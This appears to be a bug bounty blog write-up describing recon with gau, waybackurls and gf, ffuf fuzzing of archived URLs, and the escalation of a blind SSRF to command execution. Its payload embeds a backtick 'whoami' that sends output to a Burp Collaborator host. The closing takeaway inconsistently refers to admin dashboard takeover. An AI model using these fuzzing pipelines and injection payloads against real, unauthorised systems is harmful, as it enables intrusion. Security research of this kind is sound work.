Chaining an Blind SSRF bug to Get an RCE
Hi, everyone
My name is Santosh Kumar Sha, I’m a security researcher from India(Assam). In this article, I will be Discussing how I was able to get RCE by using Blind SSRF.
I am now offering 1:1 sessions to share my knowledge and expertise:
TOOLS used for the exploitation:
- gf (tomnomnom) — https://github.com/tomnomnom/gf
- qsreplace(tomnomnom) — https://github.com/tomnomnom/qsreplace)
- ffuf — https://github.com/ffuf/ffuf
- gau(Corben) — https://github.com/lc/gau
- waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls
Background of the Vulnerability:
I always wonder why great bugbounty hunter always tell about chaining the bug. I was doing some recon on target using web achieve I found an blind ssrf on targets with parameter named as “next_image” .
NOW the actual Hunting start:
So, Suppose the target name is example.com and also all subdomain are in scope.Like this
In Scope: *.example.com
While doing some recon on target using web achieve, I extracting all the urls from web achieve using waybackurls and gau . Here is command i used for that
Command used:
gau -subs example.com
waybackurls example.com
But still there is a chance that will will missing some url. So, inorder to reduce the chances for the missing url we run waybackurls on all subdomain. And grep out all the urls containing parameters and sort them uniquely and save it in file. So that can fuzzing for blind ssrf
Command used:
gau -subs example.com; subfinder -d example.com -silent |waybackurls | gf ssrf | sort -u >> testblindssrf.txt
After greping and sorting the url we saved it in a file named as “testblindssrf.txt”. Now we fuzz the url for blind ssrf using ffuf.
So for receiving the http request for blind ssrf i have used my burp collaborator . But testblindssrf.txt file have 900 url so, i used qsreplace to replace all parameter value with burpcollaborator server payload and fuzz it with ffuf.
.Command used:
cat testblindssrf.txt | qsreplace “http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net" >> ssrfuzz.txt
ffuf -c -w ssrfuzz.txt -u FUZZ -t 200
Now we will check whetherwe get any http request hit on our burp collaborator server. Fortunately i got an httpx hit on my burp server by the urls as
Vulnerable url:
http:/devtest.exampl.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net
Now it time to escalate blind ssrf to RCE:
As I was thing about how can escalate these blind ssrf sudden i remember as post of twitter i can’t remember the name of the user who posted the tips but I tried the payloads to check rce.
payload was:
http:/devtest.exampl.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net?`whoami`
Once , when i open the link on my browser i got an http request on my burp server with “whoami” rce command being a executed as show in image.
POC for Blind ssrf to rce
I quickly reported the bug and the report by triage to critical
After seeing this my reaction …
Takeaway
I’m sure that a lot of security researcher had already see there process but this how I approach to access admin dashboard , and i have reported many in bugbounty program using this process, .I hope this will help to find more admin Dashboard takeover
That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability..
Support me if you like my work! Buy me a coffee and Follow me on Twitter.
Thanks for reading :)
Stay Safe.
